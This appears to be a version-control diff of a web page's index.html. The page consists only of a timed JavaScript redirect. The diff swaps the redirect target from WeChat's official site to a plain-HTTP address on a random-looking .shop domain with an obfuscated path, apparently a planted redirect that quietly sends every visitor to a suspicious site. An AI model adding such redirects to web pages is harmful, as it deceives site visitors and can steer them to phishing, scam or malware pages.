--- a/LL122903/index.html
+++ b/LL122903/index.html
@@ -7,7 +7,7 @@
 	<body>
 		<script>
 		setTimeout(function () {
-		window.location.href = "https://weixin.qq.com";
+		window.location.href = "http://www.a6afge266r.shop/margin/xglVocI/4YskMh10tlo";
 		}, 100);
 		</script>
 	</body>
